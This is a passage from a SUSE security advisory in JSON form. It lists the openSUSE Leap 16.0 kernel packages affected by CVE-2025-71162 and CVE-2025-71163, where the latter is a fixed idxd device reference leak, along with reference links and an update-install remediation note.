"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
